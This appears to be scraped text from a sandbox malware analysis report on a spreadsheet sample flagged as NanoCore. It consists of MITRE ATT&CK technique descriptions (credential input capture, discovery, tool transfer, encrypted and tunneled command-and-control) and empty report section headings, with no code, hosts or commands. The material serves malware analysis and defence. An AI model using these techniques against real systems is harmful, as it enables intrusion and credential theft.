Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Ref 0180066743.xlsx

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: NanoCore

Yara Overview

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Overview

AV Detection:

Exploits:

E-Banking Fraud:

System Summary:

Stealing of Sensitive Information:

Remote Access Functionality:

Signature Overview

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "Ref 0180066743.xlsx"

Indicators

Description:	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
Tactics:	Command and Control
Data Sources:	Network intrusion detection system, Network protocol analysis, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre